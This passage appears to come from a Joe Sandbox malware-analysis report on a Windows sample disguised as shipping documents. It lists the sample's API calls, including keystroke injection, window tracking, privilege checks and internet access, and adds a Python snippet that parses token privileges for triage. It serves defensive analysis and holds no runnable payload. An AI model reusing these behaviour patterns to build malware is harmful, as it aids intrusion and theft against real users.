                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: c19dcc6f56c938cce691912c92c6fcf0c90dd2b07cfabca79a62165c95477e54
                                                • Instruction ID: b4a102f30e957ff50e834f52e05a22293755e063f5b9b948a77bf0d91bbcecd9
                                                • Opcode Fuzzy Hash: c19dcc6f56c938cce691912c92c6fcf0c90dd2b07cfabca79a62165c95477e54
                                                • Instruction Fuzzy Hash: F9D0C270500713DFDB204F34D80868272D9BF00352B10C939D486C2790DB78C480CA10
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00694CE1,?), ref: 00694DA2
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00694DB4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: 5135ff84acd3144672275205648e0f3fd6f0494d19836fd8eb1b55520d195bb0
                                                • Instruction ID: 2c9b7568721b059ed21f28c4a3f4d0ac7a296c6b9d773e6e6bf9b8d3ddd32e96
                                                • Opcode Fuzzy Hash: 5135ff84acd3144672275205648e0f3fd6f0494d19836fd8eb1b55520d195bb0
                                                • Instruction Fuzzy Hash: DBD0C270510713DFDB204F34D808AC672D9AF04340B00C839D8C5C2690DB78C880C610
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,007112C1), ref: 00711080
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00711092
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: a67512930105175822046792f4ca56c9203074f93004c7ad423a763b656acc29
                                                • Instruction ID: 4709f43c1796085d186d48ee5ad9b0261164fd2db3af690e5883061880f4792f
                                                • Opcode Fuzzy Hash: a67512930105175822046792f4ca56c9203074f93004c7ad423a763b656acc29
                                                • Instruction Fuzzy Hash: E3D01770910B16DFD7209F39D818A9A76E4BF09761B51CC3AE48ADA190E7B8C8C0CA50
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00709009,?,0071F910), ref: 00709403
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00709415
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: eab8e49b35ec301683ae2a069100417850ba10bac25ebc42ff32d0b99b502a8c
                                                • Instruction ID: c98572201353c6978a6d08c6d2e64a1ab0273ea857e9d19dbaa46caa60b9e397
                                                • Opcode Fuzzy Hash: eab8e49b35ec301683ae2a069100417850ba10bac25ebc42ff32d0b99b502a8c
                                                • Instruction Fuzzy Hash: 9DD0C7B0504B27EFCB208F38D90828372E6AF00341B21C83AE886C26D0E77CC880CA20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 0070E3D2
                                                • CharLowerBuffW.USER32(?,?), ref: 0070E415
                                                  • Part of subcall function 0070DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070DAD9
                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0070E615
                                                • _memmove.LIBCMT ref: 0070E628
                                                Similarity
                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                • String ID:
                                                • API String ID: 3659485706-0
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007083D8
                                                • CoUninitialize.OLE32 ref: 007083E3
                                                  • Part of subcall function 006EDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006EDAC5
                                                • VariantInit.OLEAUT32(?), ref: 007083EE
                                                • VariantClear.OLEAUT32(?), ref: 007086BF
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                APIs
                                                • GetWindowRect.USER32(0165E8A0,?), ref: 00719AD2
                                                • ScreenToClient.USER32(00000002,00000002), ref: 00719B05
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00719B72
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00706CE4
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706CF4
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00706D58
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706D64
                                                Similarity
                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                • String ID:
                                                • API String ID: 2214342067-0
                                                APIs
                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0071F910), ref: 007067BA
                                                • _strlen.LIBCMT ref: 007067EC
                                                Similarity
                                                • API ID: _strlen
                                                • String ID:
                                                • API String ID: 4218353326-0
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006FBB09
                                                • GetLastError.KERNEL32(?,00000000), ref: 006FBB2F
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006FBB54
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006FBB80
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00718B4D
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 0071AE1A
                                                • GetWindowRect.USER32(?,?), ref: 0071AE90
                                                • PtInRect.USER32(?,?,0071C304), ref: 0071AEA0
                                                • MessageBeep.USER32(00000000), ref: 0071AF11
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006F1037
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 006F1053
                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006F10B9
                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006F110B
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                APIs
                                                • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 006F1176
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 006F1192
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 006F11F1
                                                • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 006F1243
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C644B
                                                • __isleadbyte_l.LIBCMT ref: 006C6479
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C64A7
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C64DD
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00715189
                                                  • Part of subcall function 006F387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006F3897
                                                  • Part of subcall function 006F387D: GetCurrentThreadId.KERNEL32 ref: 006F389E
                                                  • Part of subcall function 006F387D: AttachThreadInput.USER32(00000000,?,006F52A7), ref: 006F38A5
                                                • GetCaretPos.USER32(?), ref: 0071519A
                                                • ClientToScreen.USER32(00000000,?), ref: 007151D5
                                                • GetForegroundWindow.USER32 ref: 007151DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: a7df68b64eba48a1a01537f1cbe7d2a88e470bec04f07ead66abf63994f91635
                                                • Instruction ID: 4b3abe071f8be71b39dc82ad6104bcfee91ebc196ac6f827cd7082215f374210
                                                • Opcode Fuzzy Hash: a7df68b64eba48a1a01537f1cbe7d2a88e470bec04f07ead66abf63994f91635
                                                • Instruction Fuzzy Hash: A5310D71900108AFDB44EFA9C8859EFB7FEEF98300F10806EE515E7251EA759E45CBA4
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • GetCursorPos.USER32(?), ref: 0071C7C2
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006CBBFB,?,?,?,?,?), ref: 0071C7D7
                                                • GetCursorPos.USER32(?), ref: 0071C824
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006CBBFB,?,?,?), ref: 0071C85E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: c88d086b65ad90b00a45acc20fe975615e55121a093be690158b72cc38dbf2df
                                                • Instruction ID: 4d98bc40d9b3d3805e02cadb9ff1e8d6ea58f444a8d87b47d68f1ed09169aff5
                                                • Opcode Fuzzy Hash: c88d086b65ad90b00a45acc20fe975615e55121a093be690158b72cc38dbf2df
                                                • Instruction Fuzzy Hash: 1A319635500118EFCB16CF9CC8D8EEA7BB6EB49310F448169F9058B2A1C7799D90DF64
                                                APIs
                                                • __setmode.LIBCMT ref: 006B0BF2
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7B20,?,?,00000000), ref: 00695B8C
                                                  • Part of subcall function 00695B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7B20,?,?,00000000,?,?), ref: 00695BB0
                                                • _fprintf.LIBCMT ref: 006B0C29
                                                • OutputDebugStringW.KERNEL32(?), ref: 006E6331
                                                  • Part of subcall function 006B4CDA: _flsall.LIBCMT ref: 006B4CF3
                                                • __setmode.LIBCMT ref: 006B0C5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: b0bb898d04a09a61ba8d22bff3711f7a4e79833bca332a3aaeeb4f2c33cc0fb8
                                                • Instruction ID: 25cd2649246b0ab52055a0891242cd7e93799074b52127a47847e6f4b80d954c
                                                • Opcode Fuzzy Hash: b0bb898d04a09a61ba8d22bff3711f7a4e79833bca332a3aaeeb4f2c33cc0fb8
                                                • Instruction Fuzzy Hash: C81102B29042187EDB45B3B8AC429FE7F6FAF41320F14416EF20597193EF71198283A9
                                                APIs
                                                   • Part of subcall function 006E8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 006E8669
                                                   • Part of subcall function 006E8652: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 006E8673
                                                   • Part of subcall function 006E8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 006E8682
                                                   • Part of subcall function 006E8652: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 006E8689
                                                   • Part of subcall function 006E8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 006E869F
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E8BEB
                                                • _memcmp.LIBCMT ref: 006E8C0E
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E8C44
                                                • HeapFree.KERNEL32(00000000), ref: 006E8C4B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 351937fd024da08ed23b9e65b09372a8094b5a3bfa3894fb824248cee01f60ab
                                                • Instruction ID: c914a3f8a8727a7bca748394f79de14fe878d12ee53e31d9f8b89e135c24476e
                                                • Opcode Fuzzy Hash: 351937fd024da08ed23b9e65b09372a8094b5a3bfa3894fb824248cee01f60ab
                                                • Instruction Fuzzy Hash: 9E21B071E02208EFCB00CFA5C948BEEB7B9EF45744F148099E458A7240EB30AE06CB60
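The record above (GetTokenInformation called twice with information class 3, i.e. TokenPrivileges, then LookupPrivilegeValueW and _memcmp, with a HeapAlloc/HeapFree pair around it) is the standard way to test whether a token holds a given privilege: query the TOKEN_PRIVILEGES size, allocate and fetch the array, look up the LUID for the privilege name, and compare that LUID against every LUID_AND_ATTRIBUTES entry. The Python below is an added example, not code from the sample or from Joe Sandbox. It parses a TOKEN_PRIVILEGES buffer in the layout GetTokenInformation returns it and performs the LUID comparison offline, which is also how you would read the structure out of a memory dump. The sample buffer is constructed; the LUID values are the well-known constants Windows assigns to built-in privileges, used here in place of LookupPrivilegeValueW, and the "token" they describe is an assumption (an elevated admin token where SeDebugPrivilege is present but not yet enabled).

```python
"""Parse a TOKEN_PRIVILEGES blob and check for a privilege by LUID (added example)."""
import struct
from typing import List, NamedTuple, Tuple

# Attribute bits from winnt.h.
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_REMOVED = 0x00000004
SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000

# Well-known LUIDs (LowPart; HighPart is 0) of built-in privileges. They are
# the same on every Windows build, so they stand in for LookupPrivilegeValueW here.
WELL_KNOWN_LUIDS = {
    "SeShutdownPrivilege": 19,
    "SeDebugPrivilege": 20,
    "SeChangeNotifyPrivilege": 23,
    "SeImpersonatePrivilege": 29,
}
LUID_NAMES = {v: k for k, v in WELL_KNOWN_LUIDS.items()}

# LUID_AND_ATTRIBUTES { LUID Luid { DWORD LowPart; LONG HighPart; }; DWORD Attributes; }
ENTRY_FMT = "<IiI"
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)  # 12 bytes


class Privilege(NamedTuple):
    luid_low: int
    luid_high: int
    attributes: int

    @property
    def enabled(self) -> bool:
        return bool(self.attributes & SE_PRIVILEGE_ENABLED)

    @property
    def name(self) -> str:
        if self.luid_high == 0 and self.luid_low in LUID_NAMES:
            return LUID_NAMES[self.luid_low]
        return f"LUID {self.luid_high:#x}:{self.luid_low:#x}"


def parse_token_privileges(buf: bytes) -> List[Privilege]:
    """Decode TOKEN_PRIVILEGES { DWORD PrivilegeCount; LUID_AND_ATTRIBUTES Privileges[]; }."""
    if len(buf) < 4:
        raise ValueError("buffer shorter than PrivilegeCount")
    (count,) = struct.unpack_from("<I", buf, 0)
    needed = 4 + count * ENTRY_SIZE
    if len(buf) < needed:
        # Same condition that makes the first GetTokenInformation call fail with
        # ERROR_INSUFFICIENT_BUFFER and report the size the caller must allocate.
        raise ValueError(f"buffer holds {len(buf)} bytes, {needed} needed for {count} entries")
    return [Privilege(*struct.unpack_from(ENTRY_FMT, buf, 4 + i * ENTRY_SIZE)) for i in range(count)]


def has_privilege(privs: List[Privilege], name: str, require_enabled: bool = False) -> bool:
    """The _memcmp step: compare the looked-up 8-byte LUID against each entry."""
    wanted: Tuple[int, int] = (WELL_KNOWN_LUIDS[name], 0)
    for p in privs:
        if (p.luid_low, p.luid_high) == wanted:
            return p.enabled if require_enabled else True
    return False


def build_token_privileges(entries: List[Tuple[str, int]]) -> bytes:
    """Build a TOKEN_PRIVILEGES buffer from (privilege name, attributes) pairs (sample data only)."""
    out = struct.pack("<I", len(entries))
    for name, attrs in entries:
        out += struct.pack(ENTRY_FMT, WELL_KNOWN_LUIDS[name], 0, attrs)
    return out


# Constructed sample: what the second GetTokenInformation call might return for an
# elevated admin token where SeDebugPrivilege is present but still disabled.
SAMPLE_TOKEN = build_token_privileges([
    ("SeChangeNotifyPrivilege", SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED),
    ("SeShutdownPrivilege", 0),
    ("SeDebugPrivilege", 0),
])

if __name__ == "__main__":
    privs = parse_token_privileges(SAMPLE_TOKEN)
    for p in privs:
        print(f"{p.name:<28} attrs={p.attributes:#010x} enabled={p.enabled}")
    print("SeDebugPrivilege present:", has_privilege(privs, "SeDebugPrivilege"))
    print("SeDebugPrivilege enabled:", has_privilege(privs, "SeDebugPrivilege", require_enabled=True))
```

The distinction between "present" and "enabled" is the one that matters in triage: a privilege that is present but disabled can be switched on with AdjustTokenPrivileges, so a sample that only checks presence is deciding whether escalation to that privilege is possible, not whether it is already in effect.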
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00701A97
                                                  • Part of subcall function 00701B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00701B40
                                                  • Part of subcall function 00701B21: InternetCloseHandle.WININET(00000000), ref: 00701BDD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Internet$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 1463438336-0
                                                • Opcode ID: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
                                                • Instruction ID: 9922b2aee79aa5bfa97ad0e399d73d6419d449b776046a8238cbfbcf1e24cd26
                                                • Opcode Fuzzy Hash: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
                                                • Instruction Fuzzy Hash: FD21CF72200600FFDB169F648C05FBAB7EDFF44700F90821AFA05966D1EB3998119BA4
                                                APIs
                                                  • Part of subcall function 006EF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,006EE1C4,?,?,?,006EEFB7,00000000,000000EF,00000119,?,?), ref: 006EF5BC
                                                  • Part of subcall function 006EF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 006EF5E2
                                                  • Part of subcall function 006EF5AD: lstrcmpiW.KERNEL32(00000000,?,006EE1C4,?,?,?,006EEFB7,00000000,000000EF,00000119,?,?), ref: 006EF613
                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,006EEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006EE1DD
                                                • lstrcpyW.KERNEL32(00000000,?), ref: 006EE203
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,006EEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 006EE237
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: 708159784389af24737b58787903eeedce1c58d050a0e3d83c0422ccccde3f94
                                                • Instruction ID: 246e074d0645c02c40dc1fbe55e8fda5280405381c04c6d863ebbaca8cc42cc2
                                                • Opcode Fuzzy Hash: 708159784389af24737b58787903eeedce1c58d050a0e3d83c0422ccccde3f94
                                                • Instruction Fuzzy Hash: 6111D336201385EFCB25AF65DC45DBA77BAFF45310B40802AF906CB290EB729951D7A4
                                                APIs
                                                • _free.LIBCMT ref: 006C5351
                                                  • Part of subcall function 006B594C: __FF_MSGBANNER.LIBCMT ref: 006B5963
                                                  • Part of subcall function 006B594C: __NMSG_WRITE.LIBCMT ref: 006B596A
                                                  • Part of subcall function 006B594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,006B1013,?), ref: 006B598F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 0525204216d2b94f8e6bea38422ad92cb7c88b27c2f5cade18f7a1d98342491c
                                                • Instruction ID: 1fafe3eea2fa1bd56f13e3ce35780d8a683dcbe0b6c66c98480b73f500511320
                                                • Opcode Fuzzy Hash: 0525204216d2b94f8e6bea38422ad92cb7c88b27c2f5cade18f7a1d98342491c
                                                • Instruction Fuzzy Hash: 5411E272504A15AECB202F64AC04BE9379AEF003A0B10452EF80E9B291EAB599C18358
                                                APIs
                                                • _memset.LIBCMT ref: 00694560
                                                  • Part of subcall function 0069410D: _memset.LIBCMT ref: 0069418D
                                                  • Part of subcall function 0069410D: _wcscpy.LIBCMT ref: 006941E1
